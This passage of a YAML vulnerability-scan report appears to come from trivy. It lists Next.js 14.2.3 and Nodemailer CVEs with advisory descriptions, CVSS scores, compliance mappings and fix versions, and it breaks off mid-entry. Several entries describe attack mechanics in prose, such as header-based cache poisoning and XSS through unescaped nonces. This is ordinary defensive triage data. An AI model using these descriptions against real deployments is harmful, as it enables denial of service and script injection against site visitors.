- https://nvd.nist.gov/vuln/detail/CVE-2026-44576
|
|
PublishedDate: '2026-05-13T17:16:23.04Z'
|
|
LastModifiedDate: '2026-05-14T13:44:18.27Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.341866666666666
|
|
epss: 0.00016
|
|
epss_percentile: 0.03853
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00064
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4721ee25bf757892
|
|
ruleId: CVE-2026-44577
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js has a Denial of Service in the Image Optimization API
|
|
title: CVE-2026-44577
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default
|
|
image loader, the Image Optimization API fetches local images entirely into memory
|
|
without enforcing a maximum size limit. An attacker could cause out-of-memory
|
|
conditions by requesting large local assets from the /_next/image endpoint that
|
|
match the images.localPatterns configuration (by default, all patterns are allowed).
|
|
This vulnerability is fixed in 15.5.16 and 16.2.5.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-44577
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id038
|
|
- CWE-770
|
|
raw:
|
|
VulnerabilityID: CVE-2026-44577
|
|
VendorIDs:
|
|
- GHSA-h64f-5h5j-jqjh
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.16, 16.2.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44577
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:9f08da120547fe06a6ff340ef05ca8e057af610a1e77041d7d119d2cea50fca0
|
|
Title: Next.js has a Denial of Service in the Image Optimization API
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the
|
|
default image loader, the Image Optimization API fetches local images entirely
|
|
into memory without enforcing a maximum size limit. An attacker could cause
|
|
out-of-memory conditions by requesting large local assets from the /_next/image
|
|
endpoint that match the images.localPatterns configuration (by default, all
|
|
patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5.
|
|
Severity: MEDIUM
|
|
CweIDs: *id038
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 5.9
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/releases/tag/v15.5.16
|
|
- https://github.com/vercel/next.js/releases/tag/v16.2.5
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-44577
|
|
PublishedDate: '2026-05-13T17:16:23.173Z'
|
|
LastModifiedDate: '2026-05-13T20:00:59.993Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.342933333333333
|
|
epss: 0.00018
|
|
epss_percentile: 0.0459
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00072
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 550fe8bea52b0c14
|
|
ruleId: CVE-2026-44580
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js has cross-site scripting in beforeInteractive scripts with untrusted
|
|
input
|
|
title: CVE-2026-44580
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive
|
|
scripts together with untrusted content can be vulnerable to cross-site scripting.
|
|
In affected versions, serialized script content was not escaped safely before
|
|
being embedded into the document, which could allow attacker-controlled input
|
|
to break out of the intended script context and execute arbitrary JavaScript in
|
|
a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-44580
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id039
|
|
- CWE-79
|
|
raw:
|
|
VulnerabilityID: CVE-2026-44580
|
|
VendorIDs:
|
|
- GHSA-gx5p-jg67-6x7h
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.16, 16.2.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44580
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:271ac03a6853a4a85c0ed6629628a269cc75c889ec605033b36b7d5a63fe43fb
|
|
Title: Next.js has cross-site scripting in beforeInteractive scripts with untrusted
|
|
input
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive
|
|
scripts together with untrusted content can be vulnerable to cross-site scripting.
|
|
In affected versions, serialized script content was not escaped safely before
|
|
being embedded into the document, which could allow attacker-controlled input
|
|
to break out of the intended script context and execute arbitrary JavaScript
|
|
in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.
|
|
Severity: MEDIUM
|
|
CweIDs: *id039
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
V3Score: 6.1
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/releases/tag/v15.5.16
|
|
- https://github.com/vercel/next.js/releases/tag/v16.2.5
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-44580
|
|
PublishedDate: '2026-05-13T18:16:18.26Z'
|
|
LastModifiedDate: '2026-05-14T18:33:34.17Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A03:2021
|
|
cweTop25_2024:
|
|
- id: CWE-79
|
|
rank: 1
|
|
category: Injection
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- &id041
|
|
function: DETECT
|
|
category: DE.CM
|
|
subcategory: DE.CM-8
|
|
description: Vulnerability scans are performed
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- &id042
|
|
requirement: 6.2.4
|
|
description: Prevent XSS attacks in bespoke software
|
|
priority: CRITICAL
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- &id043
|
|
tactic: Initial Access
|
|
technique: T1190
|
|
techniqueName: Exploit Public-Facing Application
|
|
subtechnique: ''
|
|
subtechniqueName: ''
|
|
- *id015
|
|
priority:
|
|
priority: 13.339733333333335
|
|
epss: 0.00012
|
|
epss_percentile: 0.01845
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00048
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ffcab1bb08bb5e14
|
|
ruleId: CVE-2026-44581
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js vulnerable to cross-site scripting in App Router applications using
|
|
CSP nonces
|
|
title: CVE-2026-44581
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on
|
|
CSP nonces can be vulnerable to stored cross-site scripting when deployed behind
|
|
shared caches. In affected versions, malformed nonce values derived from request
|
|
headers could be reflected into rendered HTML in an unsafe way, allowing an attacker
|
|
to poison cached responses and cause script execution for later visitors. This
|
|
vulnerability is fixed in 15.5.16 and 16.2.5.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-44581
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id040
|
|
- CWE-79
|
|
raw:
|
|
VulnerabilityID: CVE-2026-44581
|
|
VendorIDs:
|
|
- GHSA-ffhc-5mcf-pf4q
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.16, 16.2.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44581
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:6f2ba23fa5d8ac9fe972f5c6d8249e305d739b420e200ac40e762626f914dc86
|
|
Title: Next.js vulnerable to cross-site scripting in App Router applications using
|
|
CSP nonces
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely
|
|
on CSP nonces can be vulnerable to stored cross-site scripting when deployed
|
|
behind shared caches. In affected versions, malformed nonce values derived from
|
|
request headers could be reflected into rendered HTML in an unsafe way, allowing
|
|
an attacker to poison cached responses and cause script execution for later
|
|
visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.
|
|
Severity: MEDIUM
|
|
CweIDs: *id040
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
V3Score: 4.7
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/releases/tag/v15.5.16
|
|
- https://github.com/vercel/next.js/releases/tag/v16.2.5
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-44581
|
|
PublishedDate: '2026-05-13T18:16:18.4Z'
|
|
LastModifiedDate: '2026-05-14T18:30:24.34Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A03:2021
|
|
cweTop25_2024:
|
|
- id: CWE-79
|
|
rank: 1
|
|
category: Injection
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id041
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id042
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id043
|
|
- *id015
|
|
priority:
|
|
priority: 13.352000000000002
|
|
epss: 0.00035
|
|
epss_percentile: 0.10495
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0014
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f36c532127e73145
|
|
ruleId: CVE-2025-32421
|
|
severity: LOW
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'next.js: Next.js Race Condition to Cache Poisoning'
|
|
title: CVE-2025-32421
|
|
description: 'Next.js is a React framework for building full-stack web applications.
|
|
Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This
|
|
issue only affects the Pages Router under certain misconfigurations, causing normal
|
|
endpoints to serve `pageProps` data instead of standard HTML. This issue was patched
|
|
in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from
|
|
incoming requests. Applications hosted on Vercel''s platform are not affected
|
|
by this issue, as the platform does not cache responses based solely on `200 OK`
|
|
status without explicit `cache-control` headers. Those who self-host Next.js deployments
|
|
and are unable to upgrade immediately can mitigate this vulnerability by stripping
|
|
the `x-now-route-matches` header from all incoming requests at the content development
|
|
network and setting `cache-control: no-store` for all responses under risk. The
|
|
maintainers of Next.js strongly recommend only caching responses with explicit
|
|
cache-control headers.'
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-32421
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id044
|
|
- CWE-362
|
|
raw:
|
|
VulnerabilityID: CVE-2025-32421
|
|
VendorIDs:
|
|
- GHSA-qpjv-v59x-3qc4
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 14.2.24, 15.1.6
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-32421
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:64a9f428dd88df3e06576561410dff61f0fec0914799e7cfd4827204eba10d1b
|
|
Title: 'next.js: Next.js Race Condition to Cache Poisoning'
|
|
Description: 'Next.js is a React framework for building full-stack web applications.
|
|
Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This
|
|
issue only affects the Pages Router under certain misconfigurations, causing
|
|
normal endpoints to serve `pageProps` data instead of standard HTML. This issue
|
|
was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches`
|
|
header from incoming requests. Applications hosted on Vercel''s platform are
|
|
not affected by this issue, as the platform does not cache responses based solely
|
|
on `200 OK` status without explicit `cache-control` headers. Those who self-host
|
|
Next.js deployments and are unable to upgrade immediately can mitigate this
|
|
vulnerability by stripping the `x-now-route-matches` header from all incoming
|
|
requests at the content development network and setting `cache-control: no-store`
|
|
for all responses under risk. The maintainers of Next.js strongly recommend
|
|
only caching responses with explicit cache-control headers.'
|
|
Severity: LOW
|
|
CweIDs: *id044
|
|
VendorSeverity:
|
|
ghsa: 1
|
|
redhat: 1
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
V3Score: 3.7
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
V3Score: 3.7
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2025-32421
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-32421
|
|
- https://vercel.com/changelog/cve-2025-32421
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-32421
|
|
PublishedDate: '2025-05-14T23:15:47.87Z'
|
|
LastModifiedDate: '2025-09-10T15:16:10.053Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cweTop25_2024:
|
|
- id: CWE-362
|
|
rank: 21
|
|
category: Race Condition
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 6.867200000000001
|
|
epss: 0.00752
|
|
epss_percentile: 0.73386
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 2
|
|
epss_multiplier: 1.03008
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1ce95f8bcd69d427
|
|
ruleId: CVE-2025-48068
|
|
severity: LOW
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'next.js: Information exposure in Next.js dev server due to lack of origin
|
|
verification'
|
|
title: CVE-2025-48068
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2,
|
|
Next.js may have allowed limited source code exposure when the dev server was
|
|
running with the App Router enabled. The vulnerability only affects local development
|
|
environments and requires the user to visit a malicious webpage while npm run
|
|
dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-48068
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id045
|
|
- CWE-1385
|
|
raw:
|
|
VulnerabilityID: CVE-2025-48068
|
|
VendorIDs:
|
|
- GHSA-3h52-269p-cp9r
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.2.2, 14.2.30
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-48068
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:69e57f7a20f65a73ee7bd893aee36db195599076d8c92184edf8fe2c2707d9a6
|
|
Title: 'next.js: Information exposure in Next.js dev server due to lack of origin
|
|
verification'
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2,
|
|
Next.js may have allowed limited source code exposure when the dev server was
|
|
running with the App Router enabled. The vulnerability only affects local development
|
|
environments and requires the user to visit a malicious webpage while npm run
|
|
dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.
|
|
Severity: LOW
|
|
CweIDs: *id045
|
|
VendorSeverity:
|
|
ghsa: 1
|
|
nvd: 2
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N
|
|
V40Score: 2.3
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
|
|
V3Score: 4.3
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
|
|
V3Score: 4.3
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2025-48068
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-48068
|
|
- https://vercel.com/changelog/cve-2025-48068
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-48068
|
|
PublishedDate: '2025-05-30T04:15:48.51Z'
|
|
LastModifiedDate: '2025-09-10T15:17:38.677Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 6.693600000000001
|
|
epss: 0.00101
|
|
epss_percentile: 0.2732
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 2
|
|
epss_multiplier: 1.00404
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e32b41f01db1c199
|
|
ruleId: CVE-2026-44572
|
|
severity: LOW
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js's Middleware / Proxy redirects can be cache-poisoned
|
|
title: CVE-2026-44572
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data
|
|
header on a normal request to a path handled by middleware that returns a redirect.
|
|
When that happened, the middleware/proxy could treat the request as a data request
|
|
and replace the standard Location redirect header with the internal x-nextjs-redirect
|
|
header. Browsers do not follow x-nextjs-redirect, so the response became an unusable
|
|
redirect for normal clients. If the application was deployed behind a CDN or reverse
|
|
proxy that caches 3xx responses without varying on this header, a single attacker
|
|
request could poison the cached redirect response for the affected path. Subsequent
|
|
visitors could then receive a cached redirect response without a Location header,
|
|
causing a denial of service for that redirect path until the cache entry expired
|
|
or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-44572
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id046
|
|
- CWE-349
|
|
raw:
|
|
VulnerabilityID: CVE-2026-44572
|
|
VendorIDs:
|
|
- GHSA-3g8h-86w9-wvmq
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.16, 16.2.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44572
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:7a874ea313c88fdfc018ce40fae507cbe374abff06d472b78d118b05b82c32ac
|
|
Title: Next.js's Middleware / Proxy redirects can be cache-poisoned
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data
|
|
header on a normal request to a path handled by middleware that returns a redirect.
|
|
When that happened, the middleware/proxy could treat the request as a data request
|
|
and replace the standard Location redirect header with the internal x-nextjs-redirect
|
|
header. Browsers do not follow x-nextjs-redirect, so the response became an
|
|
unusable redirect for normal clients. If the application was deployed behind
|
|
a CDN or reverse proxy that caches 3xx responses without varying on this header,
|
|
a single attacker request could poison the cached redirect response for the
|
|
affected path. Subsequent visitors could then receive a cached redirect response
|
|
without a Location header, causing a denial of service for that redirect path
|
|
until the cache entry expired or was purged. This vulnerability is fixed in
|
|
15.5.16 and 16.2.5.
|
|
Severity: LOW
|
|
CweIDs: *id046
|
|
VendorSeverity:
|
|
ghsa: 1
|
|
nvd: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
|
|
V3Score: 3.7
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 5.9
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/releases/tag/v15.5.16
|
|
- https://github.com/vercel/next.js/releases/tag/v16.2.5
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-44572
|
|
PublishedDate: '2026-05-13T16:16:58.8Z'
|
|
LastModifiedDate: '2026-05-15T15:46:08.98Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 6.6688
|
|
epss: 8.0e-05
|
|
epss_percentile: 0.00741
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 2
|
|
epss_multiplier: 1.00032
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f3c2cbad0f8c4f0a
|
|
ruleId: CVE-2026-44582
|
|
severity: LOW
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js vulnerable to cache poisoning via collisions in React Server Component
|
|
cache-busting
|
|
title: CVE-2026-44582
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can
|
|
be vulnerable to cache poisoning in deployments that rely on shared caches with
|
|
insufficient response partitioning. In affected conditions, collisions in the
|
|
_rsc cache-busting value can allow an attacker to poison cache entries so users
|
|
receive the wrong response variant for a given URL. This vulnerability is fixed
|
|
in 15.5.16 and 16.2.5.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-44582
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id047
|
|
- CWE-328
|
|
raw:
|
|
VulnerabilityID: CVE-2026-44582
|
|
VendorIDs:
|
|
- GHSA-vfv6-92ff-j949
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.16, 16.2.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44582
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:5355cf71971ed497dc9db80439cbc15aecaca5f44147444b410ea52d3870a09d
|
|
Title: Next.js vulnerable to cache poisoning via collisions in React Server Component
|
|
cache-busting
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can
|
|
be vulnerable to cache poisoning in deployments that rely on shared caches with
|
|
insufficient response partitioning. In affected conditions, collisions in the
|
|
_rsc cache-busting value can allow an attacker to poison cache entries so users
|
|
receive the wrong response variant for a given URL. This vulnerability is fixed
|
|
in 15.5.16 and 16.2.5.
|
|
Severity: LOW
|
|
CweIDs: *id047
|
|
VendorSeverity:
|
|
ghsa: 1
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
|
|
V3Score: 3.7
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/releases/tag/v15.5.16
|
|
- https://github.com/vercel/next.js/releases/tag/v16.2.5
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-44582
|
|
PublishedDate: '2026-05-13T18:16:19.037Z'
|
|
LastModifiedDate: '2026-05-14T18:15:03.26Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 6.671999999999999
|
|
epss: 0.0002
|
|
epss_percentile: 0.05498
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 2
|
|
epss_multiplier: 1.0008
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 44b697423f0e8861
|
|
ruleId: CVE-2025-14874
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'nodemailer: Nodemailer: Denial of service via crafted email address header'
|
|
title: CVE-2025-14874
|
|
description: A flaw was found in Nodemailer. This vulnerability allows a denial
|
|
of service (DoS) via a crafted email address header that triggers infinite recursion
|
|
in the address parser.
|
|
